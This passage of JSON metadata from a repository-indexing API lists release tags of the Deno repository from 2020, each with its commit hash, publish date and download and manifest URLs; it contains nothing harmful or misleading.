https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/